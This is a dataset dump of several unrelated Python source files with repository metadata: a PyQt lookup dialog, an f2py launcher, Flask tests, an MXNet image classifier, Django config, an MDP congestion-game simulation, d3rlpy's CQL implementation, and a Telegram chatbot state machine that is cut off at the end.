|
aa508e822a84fde8ee8ce2a6342a2e5da946cb43
|
/src/view/finder/lookup.py
|
6abad178573092a73646919897cad1189abe8ec4
|
[
"Apache-2.0"
] |
permissive
|
gustavosaquetta/FrameworkSSQt-Vocatus
|
a4ea093f05aa4d503ca86603312198aa869675ec
|
485dc401e05859f68fe198aa2106675839585a13
|
refs/heads/master
| 2020-04-14T19:01:07.349185
| 2019-01-04T01:31:23
| 2019-01-04T01:31:23
| 164,041,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 946
|
py
|
import platform, sys, os
sys.path.append(os.getcwd())
from PyQt5 import uic
from PyQt5.QtWidgets import *
from PyQt5 import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from sources.dialog.finddialog import DialogFindCliente
def lookup_cliente(parent):
LC = LookupCliente(parent)
LC.exec_()
class LookupCliente(DialogFindCliente):
def __init__(self, parent):
from controller.cliente import ClienteController
campos = ['Nome', 'Código']
super(LookupCliente, self).__init__(cb_campo_list=campos, classe=ClienteController)
self.setWindowTitle('Localizar Cliente')
self.parent = parent
def prepare_view(self, parent):
parent.grupo.setProperty('id', int(self.ret.get('id')))
parent.grupo.setProperty('title', self.ret.get('nome'))
parent.grupo_codigo.setProperty('text', self.ret.get('codigo'))
if __name__ == "__main__":
appcl = QApplication(sys.argv)
w = LookupCliente()
w.main()
sys.exit(appcl.exec_())
|
[
"gustavosaquetta@gmail.com"
] |
gustavosaquetta@gmail.com
|
4848f0665aac256b274f1b523e25452b01fe47cd
|
747e83c2624fd9bcd8a44b293c54d10672965fcd
|
/venv/bin/f2py
|
77d06710d00d5aae0389fff94fbd588f27919504
|
[] |
no_license
|
al11588/MLTut
|
430b2b40aeddf616b3bc860a7b65189c1339d2f4
|
e1b320178b33b6192f7542f305b544047062f1cf
|
refs/heads/master
| 2016-09-14T08:21:13.815887
| 2016-05-03T16:21:02
| 2016-05-03T16:21:02
| 57,983,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 790
|
#!/Users/alvinlawson/Desktop/MLTut/venv/bin/python
# See http://cens.ioc.ee/projects/f2py2e/
from __future__ import division, print_function
import os
import sys
for mode in ["g3-numpy", "2e-numeric", "2e-numarray", "2e-numpy"]:
try:
i = sys.argv.index("--" + mode)
del sys.argv[i]
break
except ValueError:
pass
os.environ["NO_SCIPY_IMPORT"] = "f2py"
if mode == "g3-numpy":
sys.stderr.write("G3 f2py support is not implemented, yet.\\n")
sys.exit(1)
elif mode == "2e-numeric":
from f2py2e import main
elif mode == "2e-numarray":
sys.argv.append("-DNUMARRAY")
from f2py2e import main
elif mode == "2e-numpy":
from numpy.f2py import main
else:
sys.stderr.write("Unknown mode: " + repr(mode) + "\\n")
sys.exit(1)
main()
|
[
"al11588@gmail.com"
] |
al11588@gmail.com
|
|
f6a8c9e639d06784cd89ac6597e1506e0d2a561a
|
869f3cc7c4b5c0c0b138c76cf457ebc5f7a35525
|
/tests/v1/test_redflag_view.py
|
40535fe7e06bda81f7f7c7400950171c925cc5fc
|
[
"MIT"
] |
permissive
|
Curti-s/ireporter-api
|
dc3c1dea0373243c0035e8d5200c0a33bc106ab5
|
57b225508f58fd33c848bc480a6dd5b7a5ea5790
|
refs/heads/develop
| 2022-12-10T11:24:10.653374
| 2018-12-08T15:42:01
| 2018-12-08T15:42:01
| 158,517,000
| 2
| 0
| null | 2022-12-08T01:27:49
| 2018-11-21T08:41:03
|
Python
|
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
import unittest
import datetime
import uuid
from flask import request, json
from rapidjson import dump, dumps, loads, load, DM_ISO8601, UM_CANONICAL
from app import create_app
from app.v1.models.red_flag_model import RedFlagModel
class TestRedFlagView(unittest.TestCase):
"""Test RedFlagView api"""
def setUp(self):
self.app = create_app('testing')
self.client = self.app.test_client
self.red_flag_data = dict(
id = uuid.uuid4(),
created_on = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'),
created_by = "curtis",
record_type = "red flag",
location = '0.0236° S, 37.9062° E',
status = "New red flag",
image = " ",
video = " ",
comment = "Red flag comment"
)
def test_create(self):
with self.client():
response = self.client().post('/',
data=dumps(self.red_flag_data,datetime_mode=DM_ISO8601,
uuid_mode=UM_CANONICAL), content_type="application/json")
response_data = loads(response.data.decode())
self.assertEqual(response.status_code,201)
self.assertEqual(response.content_type,'application/json')
self.assertEqual(response_data['status'],201)
self.assertEqual(response_data['message'], 'Created red-flag record')
self.assertEqual(isinstance(response_data['message'],str),True)
def test_get_all(self):
with self.client():
response = self.client().post('/',
data=dumps(self.red_flag_data,datetime_mode=DM_ISO8601,
uuid_mode=UM_CANONICAL), content_type="application/json")
response_data = loads(response.data.decode())
self.assertEqual(response.status_code, 201)
request_data = self.client().get('/')
self.assertEqual(request_data.status_code,200)
def test_get_one(self):
with self.client():
response = self.client().post('/',
data=dumps(self.red_flag_data,datetime_mode=DM_ISO8601,
uuid_mode=UM_CANONICAL), content_type="application/json")
json_result = loads(response.data.decode('utf-8').replace("'","\""))
self.assertEqual(response.status_code,201)
if __name__ == '__main__':
unittest.main()
|
[
"matthewscurtis81@gmail.com"
] |
matthewscurtis81@gmail.com
|
48e7fc8b558dd07f858cd8b423266154dce93c74
|
12ed734433de51f1cf7b9d8900f4b831e996a80f
|
/script/execute.py
|
e449dd5d841f86445d703f61803d960627f903e4
|
[] |
no_license
|
TimoBergerbusch/DeepLearningFuerAutonomesFahren
|
7c884d52149ffab9690d3a5d575453ef6d437181
|
04c2161b8833964ee00ad50fa751b92c4dc58ca2
|
refs/heads/master
| 2020-03-13T14:47:00.745716
| 2018-07-03T18:18:21
| 2018-07-03T18:18:21
| 131,165,253
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,740
|
py
|
import mxnet as mx
path='http://data.mxnet.io/models/imagenet/'
[mx.test_utils.download(path+'resnet/50-layers/resnet-50-0000.params'),
mx.test_utils.download(path+'resnet/50-layers/resnet-50-symbol.json'),
mx.test_utils.download(path+'synset.txt')]
ctx = mx.cpu()
sym, arg_params, aux_params = mx.model.load_checkpoint('resnet-50', 0)
mod = mx.mod.Module(symbol=sym, context=ctx, label_names=None)
mod.bind(for_training=False, data_shapes=[('data', (1,3,224,224))],
label_shapes=mod._label_shapes)
mod.set_params(arg_params, aux_params, allow_missing=True)
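# The module is bound for single-image inference: batch size 1, 3 channels,
# and a 224x224 input, which matches the resizing done in get_image() below.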
with open('synset.txt', 'r') as f:
labels = [l.rstrip() for l in f]
import matplotlib.pyplot as plt
import numpy as np
# define a simple data batch
from collections import namedtuple
Batch = namedtuple('Batch', ['data'])
def get_image(url, show=False):
# download and show the image
fname = mx.test_utils.download(url)
img = mx.image.imread(fname)
if img is None:
return None
if show:
plt.imshow(img.asnumpy())
plt.axis('off')
# convert into format (batch, RGB, width, height)
img = mx.image.imresize(img, 224, 224) # resize
img = img.transpose((2, 0, 1)) # Channel first
img = img.expand_dims(axis=0) # batchify
return img
def predict(url):
img = get_image(url, show=True)
# compute the predict probabilities
mod.forward(Batch([img]))
prob = mod.get_outputs()[0].asnumpy()
# print the top-5
prob = np.squeeze(prob)
a = np.argsort(prob)[::-1]
for i in a[0:5]:
print('probability=%f, class=%s' %(prob[i], labels[i]))
#predict('https://github.com/dmlc/web-data/blob/master/mxnet/doc/tutorials/python/predict_image/cat.jpg?raw=true')
loop = True
my_map = {"pic2" : 'https://github.com/dmlc/web-data/blob/master/mxnet/doc/tutorials/python/predict_image/cat.jpg?raw=true',
"pic1" : 'https://github.com/dmlc/web-data/blob/master/mxnet/doc/tutorials/python/predict_image/dog.jpg?raw=true',
"pic5" : 'https://i.ytimg.com/vi/dOULgRg0Sf8/maxresdefault.jpg?raw=true',
"pic3" : 'http://www.daftrucks.de/~/media/images/daf%20trucks/online%20truck%20configurator/background/backgroundvisual.jpg?h=1184&w=1875&la=de-DE?raw=true',
"pic4" : 'https://i.ebayimg.com/00/s/NjcxWDEwMjQ=/z/q~IAAOSwkEVXGp5B/$_72.JPG?raw=true',
"pic6" : 'https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/2/2017/01/Orbea-gain.jpeg?raw=true',
"shit" : 'https://telebasel.ch/wp-content/uploads/2017/09/wut6hxr.jpg?raw=true'}
while loop:
name = raw_input("Name of Image to classify: ")
if name == "exit":
loop = False
else:
if name in my_map:
url = my_map[name];
predict(url)
|
[
"timo-bergerbusch@web.de"
] |
timo-bergerbusch@web.de
|
d77213cb938364654b4537ff2566cb0d30598b49
|
12bbad5d5f81f0c9b11fc9db3dee69b901f44469
|
/api/migrations/0006_auto_20201022_0439.py
|
9184a6a2dc892b48f822049a0a024cb18eda13e1
|
[] |
no_license
|
youflox/news
|
d5e0432e57093d6f4c49015d361ffe01cbd1c48e
|
e0e829727ac046f36fdeaf9335002c1c2c83684d
|
refs/heads/master
| 2023-01-08T21:07:11.295421
| 2020-11-06T07:47:57
| 2020-11-06T07:47:57
| 309,968,222
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
# Generated by Django 3.1.2 on 2020-10-21 23:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0005_article_image'),
]
operations = [
migrations.AlterField(
model_name='article',
name='image',
field=models.ImageField(upload_to='images'),
),
]
|
[
"youflox@gmail.com"
] |
youflox@gmail.com
|
8fca3250922d478ef9165789a3684f85de825780
|
56419dc6dc955a0c87fe13d95f318b7819217317
|
/d3rlpy/algos/torch/cql_impl.py
|
6dadeb6912841b35aa1de0c3bec784c1b4f66a48
|
[
"MIT"
] |
permissive
|
Mobius1D/d3rlpy
|
85f67f8380dd11836b61dceadc550fa8083341cc
|
f279245e3c8dcd89bd8c8abafcfdf1dff50b7fce
|
refs/heads/master
| 2023-06-19T11:36:06.518270
| 2021-07-09T20:53:40
| 2021-07-09T20:53:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,912
|
py
|
import math
from typing import Optional, Sequence
import numpy as np
import torch
import torch.nn.functional as F
from torch.optim import Optimizer
from ...gpu import Device
from ...models.builders import create_parameter
from ...models.encoders import EncoderFactory
from ...models.optimizers import OptimizerFactory
from ...models.q_functions import QFunctionFactory
from ...models.torch import Parameter
from ...preprocessing import ActionScaler, Scaler
from ...torch_utility import TorchMiniBatch, torch_api, train_api
from .dqn_impl import DoubleDQNImpl
from .sac_impl import SACImpl
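# CQL adds a conservative penalty on top of the SAC critic loss: a log-sum-exp
# over Q-values of sampled (policy and uniform-random) actions minus the
# Q-values of the dataset actions, weighted by a learned alpha.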
class CQLImpl(SACImpl):
_alpha_learning_rate: float
_alpha_optim_factory: OptimizerFactory
_initial_alpha: float
_alpha_threshold: float
_conservative_weight: float
_n_action_samples: int
_soft_q_backup: bool
_log_alpha: Optional[Parameter]
_alpha_optim: Optional[Optimizer]
def __init__(
self,
observation_shape: Sequence[int],
action_size: int,
actor_learning_rate: float,
critic_learning_rate: float,
temp_learning_rate: float,
alpha_learning_rate: float,
actor_optim_factory: OptimizerFactory,
critic_optim_factory: OptimizerFactory,
temp_optim_factory: OptimizerFactory,
alpha_optim_factory: OptimizerFactory,
actor_encoder_factory: EncoderFactory,
critic_encoder_factory: EncoderFactory,
q_func_factory: QFunctionFactory,
gamma: float,
tau: float,
n_critics: int,
target_reduction_type: str,
initial_temperature: float,
initial_alpha: float,
alpha_threshold: float,
conservative_weight: float,
n_action_samples: int,
soft_q_backup: bool,
use_gpu: Optional[Device],
scaler: Optional[Scaler],
action_scaler: Optional[ActionScaler],
):
super().__init__(
observation_shape=observation_shape,
action_size=action_size,
actor_learning_rate=actor_learning_rate,
critic_learning_rate=critic_learning_rate,
temp_learning_rate=temp_learning_rate,
actor_optim_factory=actor_optim_factory,
critic_optim_factory=critic_optim_factory,
temp_optim_factory=temp_optim_factory,
actor_encoder_factory=actor_encoder_factory,
critic_encoder_factory=critic_encoder_factory,
q_func_factory=q_func_factory,
gamma=gamma,
tau=tau,
n_critics=n_critics,
target_reduction_type=target_reduction_type,
initial_temperature=initial_temperature,
use_gpu=use_gpu,
scaler=scaler,
action_scaler=action_scaler,
)
self._alpha_learning_rate = alpha_learning_rate
self._alpha_optim_factory = alpha_optim_factory
self._initial_alpha = initial_alpha
self._alpha_threshold = alpha_threshold
self._conservative_weight = conservative_weight
self._n_action_samples = n_action_samples
self._soft_q_backup = soft_q_backup
# initialized in build
self._log_alpha = None
self._alpha_optim = None
def build(self) -> None:
self._build_alpha()
super().build()
self._build_alpha_optim()
def _build_alpha(self) -> None:
initial_val = math.log(self._initial_alpha)
self._log_alpha = create_parameter((1, 1), initial_val)
def _build_alpha_optim(self) -> None:
assert self._log_alpha is not None
self._alpha_optim = self._alpha_optim_factory.create(
self._log_alpha.parameters(), lr=self._alpha_learning_rate
)
def compute_critic_loss(
self, batch: TorchMiniBatch, q_tpn: torch.Tensor
) -> torch.Tensor:
loss = super().compute_critic_loss(batch, q_tpn)
conservative_loss = self._compute_conservative_loss(
batch.observations, batch.actions, batch.next_observations
)
return loss + conservative_loss
@train_api
@torch_api()
def update_alpha(self, batch: TorchMiniBatch) -> np.ndarray:
assert self._alpha_optim is not None
assert self._q_func is not None
assert self._log_alpha is not None
# Q function should be inference mode for stability
self._q_func.eval()
self._alpha_optim.zero_grad()
# the original implementation does scale the loss value
loss = -self._compute_conservative_loss(
batch.observations, batch.actions, batch.next_observations
)
loss.backward()
self._alpha_optim.step()
cur_alpha = self._log_alpha().exp().cpu().detach().numpy()[0][0]
return loss.cpu().detach().numpy(), cur_alpha
def _compute_policy_is_values(
self, policy_obs: torch.Tensor, value_obs: torch.Tensor
) -> torch.Tensor:
assert self._policy is not None
assert self._q_func is not None
with torch.no_grad():
policy_actions, n_log_probs = self._policy.sample_n_with_log_prob(
policy_obs, self._n_action_samples
)
obs_shape = value_obs.shape
repeated_obs = value_obs.expand(self._n_action_samples, *obs_shape)
# (n, batch, observation) -> (batch, n, observation)
transposed_obs = repeated_obs.transpose(0, 1)
# (batch, n, observation) -> (batch * n, observation)
flat_obs = transposed_obs.reshape(-1, *obs_shape[1:])
# (batch, n, action) -> (batch * n, action)
flat_policy_acts = policy_actions.reshape(-1, self.action_size)
# estimate action-values for policy actions
policy_values = self._q_func(flat_obs, flat_policy_acts, "none")
policy_values = policy_values.view(
self._n_critics, obs_shape[0], self._n_action_samples
)
log_probs = n_log_probs.view(1, -1, self._n_action_samples)
# importance sampling
return policy_values - log_probs
def _compute_random_is_values(self, obs: torch.Tensor) -> torch.Tensor:
assert self._q_func is not None
repeated_obs = obs.expand(self._n_action_samples, *obs.shape)
# (n, batch, observation) -> (batch, n, observation)
transposed_obs = repeated_obs.transpose(0, 1)
# (batch, n, observation) -> (batch * n, observation)
flat_obs = transposed_obs.reshape(-1, *obs.shape[1:])
# estimate action-values for actions from uniform distribution
# uniform distribution between [-1.0, 1.0]
flat_shape = (obs.shape[0] * self._n_action_samples, self._action_size)
zero_tensor = torch.zeros(flat_shape, device=self._device)
random_actions = zero_tensor.uniform_(-1.0, 1.0)
random_values = self._q_func(flat_obs, random_actions, "none")
random_values = random_values.view(
self._n_critics, obs.shape[0], self._n_action_samples
)
random_log_probs = math.log(0.5 ** self._action_size)
# importance sampling
return random_values - random_log_probs
def _compute_conservative_loss(
self, obs_t: torch.Tensor, act_t: torch.Tensor, obs_tp1: torch.Tensor
) -> torch.Tensor:
assert self._policy is not None
assert self._q_func is not None
assert self._log_alpha is not None
policy_values_t = self._compute_policy_is_values(obs_t, obs_t)
policy_values_tp1 = self._compute_policy_is_values(obs_tp1, obs_t)
random_values = self._compute_random_is_values(obs_t)
# compute logsumexp
# (n critics, batch, 3 * n samples) -> (n critics, batch, 1)
target_values = torch.cat(
[policy_values_t, policy_values_tp1, random_values], dim=2
)
logsumexp = torch.logsumexp(target_values, dim=2, keepdim=True)
# estimate action-values for data actions
data_values = self._q_func(obs_t, act_t, "none")
loss = logsumexp.mean(dim=0).mean() - data_values.mean(dim=0).mean()
scaled_loss = self._conservative_weight * loss
# clip for stability
clipped_alpha = self._log_alpha().exp().clamp(0, 1e6)[0][0]
return clipped_alpha * (scaled_loss - self._alpha_threshold)
def compute_target(self, batch: TorchMiniBatch) -> torch.Tensor:
if self._soft_q_backup:
target_value = super().compute_target(batch)
else:
target_value = self._compute_deterministic_target(batch)
return target_value
def _compute_deterministic_target(
self, batch: TorchMiniBatch
) -> torch.Tensor:
assert self._policy
assert self._targ_q_func
with torch.no_grad():
action = self._policy.best_action(batch.next_observations)
return self._targ_q_func.compute_target(
batch.next_observations,
action,
reduction=self._target_reduction_type,
)
class DiscreteCQLImpl(DoubleDQNImpl):
_alpha: float
def __init__(
self,
observation_shape: Sequence[int],
action_size: int,
learning_rate: float,
optim_factory: OptimizerFactory,
encoder_factory: EncoderFactory,
q_func_factory: QFunctionFactory,
gamma: float,
n_critics: int,
target_reduction_type: str,
alpha: float,
use_gpu: Optional[Device],
scaler: Optional[Scaler],
):
super().__init__(
observation_shape=observation_shape,
action_size=action_size,
learning_rate=learning_rate,
optim_factory=optim_factory,
encoder_factory=encoder_factory,
q_func_factory=q_func_factory,
gamma=gamma,
n_critics=n_critics,
target_reduction_type=target_reduction_type,
use_gpu=use_gpu,
scaler=scaler,
)
self._alpha = alpha
def compute_loss(
self,
batch: TorchMiniBatch,
q_tpn: torch.Tensor,
) -> torch.Tensor:
loss = super().compute_loss(batch, q_tpn)
conservative_loss = self._compute_conservative_loss(
batch.observations, batch.actions.long()
)
return loss + self._alpha * conservative_loss
def _compute_conservative_loss(
self, obs_t: torch.Tensor, act_t: torch.Tensor
) -> torch.Tensor:
assert self._q_func is not None
# compute logsumexp
policy_values = self._q_func(obs_t)
logsumexp = torch.logsumexp(policy_values, dim=1, keepdim=True)
# estimate action-values under data distribution
one_hot = F.one_hot(act_t.view(-1), num_classes=self.action_size)
data_values = (self._q_func(obs_t) * one_hot).sum(dim=1, keepdim=True)
return (logsumexp - data_values).mean()
|
[
"takuma.seno@gmail.com"
] |
takuma.seno@gmail.com
|
49c911a5de0008425794db6a96232f235ca75f7d
|
9fdb325cf3fd1c469e5cad853ad8bf1a604b44c7
|
/netlabproject/wsgi.py
|
5aab4c221593ea4bcdd402cc3fe39b9019c113bd
|
[] |
no_license
|
abkristanto/photatoes-django
|
3290e5a4c246eab19187fcc51899e0bee727beed
|
b40a20c37e4141a8fd5503c94b9d243ace545369
|
refs/heads/master
| 2023-04-03T14:44:18.499511
| 2021-04-10T16:14:24
| 2021-04-10T16:14:24
| 356,628,839
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
"""
WSGI config for netlabproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'netlabproject.settings')
application = get_wsgi_application()
|
[
"abkristanto@gmail.com"
] |
abkristanto@gmail.com
|
fac7ca009bd5cd773c1943f1dfee737a0cbdee65
|
4ca0b9d8beec6d4ac2ac64b53429b298b7819311
|
/mdp_congestion_game_col_avoidance.py
|
a083cd73744f554f44cc46c759394260d759a62d
|
[] |
no_license
|
lisarah/mdp
|
36097040f7b6d80d9eddb044c644cd0d6ab005e0
|
fc6915aad79e6f9525d485c6fe00bf0d98ca8f53
|
refs/heads/master
| 2022-06-09T15:46:48.335282
| 2022-06-02T02:56:30
| 2022-06-02T02:56:30
| 207,250,240
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,782
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 2 17:22:30 2021
@author: Sarah Li
"""
import numpy as np
import visualization as vs
import util as ut
import matplotlib.pyplot as plt
import dynamicProg as dp
import random
np.random.seed(121)
Columns = 10
Rows = 5
A = 4
T = 100
P = ut.nonErgodicMDP(Rows, Columns, p=0.98)
player_num = 3
C = [np.ones((Rows* Columns, A, T+1)) for _ in range(player_num)]
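# Congestion cost: every (state, action) pair at time t is penalized by the
# total occupancy mass sitting in that state at time t (summed over actions).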
def update_cost(y):
congestion_cost = np.zeros((Rows*Columns, A, T+1))
for x_ind in range(Columns):
for y_ind in range(Rows):
unwrap_ind = (y_ind * Columns + x_ind)
for t in range(T+1):
congestion_cost[unwrap_ind,:, t] += np.sum(
y[unwrap_ind * A:(unwrap_ind + 1) * A, t])
return congestion_cost
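# update_y propagates the initial state distribution through the Markov chain
# induced by the time-varying policy and returns the state-action occupancy
# y[s*A:(s+1)*A, t] = x[s, t] * policy(s, a, t).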
def update_y(policy, x_0): # policy should be 1D array
x = np.zeros((Rows*Columns, T+1))
x[:, 0] = x_0
y = np.zeros((Rows*Columns*A, T+1))
for t in range(T):
markov_chain = P.dot(policy[:,:,t].T)
x[:, t+1] = markov_chain.dot(x[:, t])
for s in range(Rows*Columns):
y[s*A:(s + 1)*A, t] = x[s, t] * policy[s, s*A:(s + 1)*A, t]
for s in range(Rows*Columns):
y[s*A:(s + 1)*A, T] = x[s, T] / A
# print(np.round(x[:,T],2))
# print(x[:,T].shape)
# print(np.sum(x[:,T]))
return y
target_col = [9, 7, 2]# , 4, 0, 5, 1
target_row = Rows - 1
for p in range(player_num):
C[p][target_row*Columns + target_col[p], :, :] = 0.
policy = ut.random_initial_policy_finite(Rows, Columns, A, T, player_num)
initial_x = [np.zeros(Rows*Columns) for _ in range(player_num)]
x_init_state = random.sample(range(Columns), player_num)
x = [[] for _ in range(player_num)]
for p in range(player_num):
initial_x[p][x_init_state[p]] = 1.
x[p].append(update_y(policy[:,:,:,p], initial_x[p]))
# col_div = int(Columns/player_num* A)
# for p in range(player_num):
# initial_x[p][col_div*p:col_div *(p+1)] = 1./col_div
# x[p].append(update_y(policy[:,:,:,p], initial_x[p]))
actions = [[] for _ in range(player_num)]
for p in range(player_num):
for s in range(Rows*Columns):
p_action, = np.where(policy[s, s*A:(s+1)*A, 0, p] == 1.)
# print(f' action is {policy[s, s*A:(s+1)*A, 0, p] }')
if len(p_action) > 0:
actions[p].append(p_action[0])
else:
actions[p].append(0)
# draw initial policy for player zero
axis, value_grids, _ = vs.init_grid_plot(Rows, Columns, list(np.sum(C[0][:,:,0],axis=1))+[4])
vs.draw_policies(Rows, Columns, actions[0], axis)
Iterations = 30
V_hist= [[] for _ in range(player_num)]
costs = [[] for _ in range(player_num)]
gamma = 0.9
step_size = []
# y_lists = [[y[p]]]
# y_1_list = [y_1]
# y_2_list = [y_2]
for i in range(Iterations):
step_size.append(1/(i+1))
for i in range(Iterations):
next_distribution = []
next_policy = []
for p in range(player_num):
y = sum([x[p][-1] for p in range(player_num)])
p_cost = C[p] + 1.25 * update_cost(y) # 1.25
costs[p].append(1*p_cost)
V, pol_new = dp.value_iteration_finite(P, 1*p_cost, g=gamma)
next_policy.append(pol_new)
for p in range(player_num):
policy[:,:,:,p] = (1 - step_size[i]) * policy[:,:,:,p] + step_size[i] * next_policy[p]
V_hist[p].append(list(ut.value_finite(P, policy[:,:,:,p], 1*p_cost, gamma)))
# new_y1 =
# new_y2 = update_y(policy[:,:,:,1], initial_x_2)
[x[p].append(update_y(policy[:,:,:,p], initial_x[p])) for p in range(player_num)]
# y_2_list.append(1*new_y2)
# ---------------- if plotting initial steps of frank-wolfe ------------#
plot_frank_wolfe = False # this only works if Iterations = 1
player = 1
plot_time = T - 1
if plot_frank_wolfe:
cost_plot, val_grids, _ = vs.init_grid_plot(
Rows, Columns, list(np.sum(costs[-1][:,:,plot_time],axis=1)))
dp_policy = []
original_policy = []
for s in range(Rows*Columns):
pol, = np.where(policy[s, s*A:(s+1)*A,plot_time, player] == 1)
original_policy.append(pol[0])
pol, = np.where(next_policy[player][s, s*A:(s+1)*A,plot_time] == 1)
dp_policy.append(pol[0])
vs.draw_policies(Rows, Columns,next_policy, cost_plot)
# vs.draw_policies_interpolate(Rows, Columns,dp_policy, actions_1, cost_plot)
plt.show()
V_hist_array = np.array(V_hist) # player, Iterations(alg), states, Timesteps+1
plt.figure()
plt.title('state values')
for s in range(Rows*Columns):
plt.plot(V_hist_array[0,-1, s, :])
plt.show()
cost_array = [np.array(costs[p]) for p in range(player_num)]
for p in range(player_num):
plt.figure()
plt.title(f'player {p} costs')
for s in range(Rows*Columns):
plt.plot(np.sum(cost_array[p][:, s, :,T-1], axis=1))
plt.show()
# p1_costs = list(np.sum(cost_array[33, :,:,T-1],axis=1))
p1_costs = list(np.sum(cost_array[0][Iterations - 1, :,:,T],axis=1))
p1_values = V_hist_array[0,Iterations - 1, :, T-1]
total_player_costs = np.zeros(Columns * Rows)
target_col = [9, 7, 2, 4, 0] #, 1, 5
target_row = Rows - 1
for t_col in target_col:
total_player_costs[target_row*Columns + t_col] = 1.
color_map, norm, _ = vs.color_map_gen(total_player_costs)
ax, value_grids, f = vs.init_grid_plot(Rows, Columns, total_player_costs)
plt.show()
p_inits = [np.random.randint(0, Columns - 1) for p in range(player_num)]
# p1_init = np.random.randint(0, Columns - 1) # start randomly in the top row
# p2_init = np.random.randint(0, Columns - 1) # start randomly in the top row
# vs.simulate(p1_init, p2_init, policy, p1_values, value_grids, A,
# Rows, Columns, P, Time = T)
print('visualizing now')
vs.animate_traj('traj_ouput.mp4', f, p_inits, policy, total_player_costs,
value_grids, A, Rows, Columns, P, Time = T)
# # v_max_1 = np.max(V_hist_array[0, -1, :])
# # v_min_1 = np.min(V_hist_array[0, -1, :])
# # # v_max_2 = np.max(V_hist_array[1, -1, :])
# # # v_min_2 = np.min(V_hist_array[1, -1, :])
# # norm_1 = mpl.colors.Normalize(vmin=v_min_1, vmax=v_max_1)
# # # norm_2 = mpl.colors.Normalize(vmin=v_min_2, vmax=v_max_2)
# # color_map = plt.get_cmap('coolwarm')
# # f_1, axis_1 = plt.subplots(1)
# # value_grids_1 = []
# # for x_ind in range(Rows):
# # value_grids_1.append([])
# # for y_ind in range(Columns):
# # R,G,B,_ = color_map(norm_1((V_hist_array[0, -1, x_ind*Columns+ y_ind])))
# # color = [R,G,B]
# # value_grids_1[-1].append(plt.Rectangle((y_ind, x_ind), 1, 1,
# # fc=color, ec='xkcd:greyish blue'))
# # axis_1.add_patch(value_grids_1[-1][-1])
# # plt.axis('scaled')
# # axis_1.xaxis.set_visible(False)
# # axis_1.yaxis.set_visible(False)
|
[
"crab.apples00@gmail.com"
] |
crab.apples00@gmail.com
|
e5e0604d2d3fa39230cbda76d99c4414a162dd4e
|
252bc6452fea2cd61f86f23542001b51b90541a8
|
/fsm.py
|
d1d38936e290adb611d8ec256f83aa39abd34cb7
|
[] |
no_license
|
baronrustamov/Toc-project-telegram-chatbot-with-api.ai
|
656853e30c1180cf30201b86882816721d2853e7
|
9ea7dae87bf4902f17cb7e48b623bcf38345c906
|
refs/heads/master
| 2023-05-28T06:46:55.535456
| 2017-06-14T13:59:31
| 2017-06-14T13:59:31
| 345,258,432
| 0
| 0
| null | 2023-05-01T19:53:42
| 2021-03-07T04:31:33
| null |
UTF-8
|
Python
| false
| false
| 4,368
|
py
|
from transitions.extensions import GraphMachine
class TocMachine(GraphMachine):
def __init__(self, **machine_configs):
self.machine = GraphMachine(
model = self,
**machine_configs
)
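    # The transitions library evaluates the is_going_to_stateN methods as
    # transition conditions and calls the on_enter_/on_exit_ hooks automatically,
    # so each handler below either matches the incoming message text or
    # replies with the prompt for that state.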
def is_going_to_state1(self, update):
text = update.message.text
##print("check1")
return text == 'find_album_from_state0'
def is_going_to_state2(self, update):
text = update.message.text
#print("check2")
return text == 'show_recommendation_from_state0'
def is_going_to_state3(self, update):
text = update.message.text
return text == 'top_track_from_state0'
def is_going_to_state4(self, update):
text = update.message.text
#print ("check 4 ")
return text == 'find_album_by_enter_singer'
def is_going_to_state5(self, update):
text = update.message.text
#print ("check 5 ")
return text == 'list_song_by_album_name'
def is_going_to_state6(self, update):
text = update.message.text
#print ("check 6 ")
return text == 'play_music'
def is_going_to_state7(self, update):
text = update.message.text
#print ("check 7 ")
return text == 'recommend_by_singer'
def is_going_to_state8(self, update):
text = update.message.text
#print ("check 8 ")
return text == 'play_music'
def is_going_to_state9(self, update):
text = update.message.text
#print ("check 9 ")
return text == 'find_album_by_enter_singer'
def is_going_to_state10(self, update):
text = update.message.text
#print ("check 10 ")
return text == 'play_music'
def on_enter_state1(self,update):
print("enter state 1")
update.message.reply_text("(I'm entering state1)\nPlease enter the singer\n I will list all the album by this artist")
#self.go_back(update)
def on_exit_state1(self, update):
print('Leaving state1')
def on_enter_state2(self, update):
update.message.reply_text("(I'm entering state2)\nPlease enter your favorite singer\nI will recommend some similiar song for you\nThe input format need to be 'recommended by singer' ")
#self.go_back(update)
def on_exit_state2(self, update):
print('Leaving state2')
def on_enter_state3(self, update):
update.message.reply_text("(I'm entering state3)\nPlease enter the singer\n I will show his(her) top 10 tracks. ")
#self.go_back(update)
def on_exit_state3(self, update):
print('Leaving state3')
def on_enter_state4(self, update):
update.message.reply_text("(I'm entering state4)\nPlease enter the album you want .I will list all the song in the album for u")
#self.go_back(update)
def on_exit_state4(self, update):
print('Leaving state4')
def on_enter_state5(self, update):
update.message.reply_text("(I'm entering state5)\nI'll list all the song in the album!!")
#self.go_back(update)
def on_exit_state5(self, update):
print('Leaving state5')
def on_enter_state6(self, update):
update.message.reply_text("(I'm entering state6)\nI'll open the spotify app for you")
#self.go_back(update)
def on_exit_state6(self, update):
#self.go_back(update)
print('Leaving state6')
def on_enter_state7(self, update):
update.message.reply_text("(I'm entering state7)\n")
#self.go_back(update)
def on_exit_state7(self, update):
print('Leaving state7')
def on_enter_state8(self, update):
update.message.reply_text("(I'm entering state8)\nI'll open the spotify app for you")
#self.go_back(update)
def on_exit_state8(self, update):
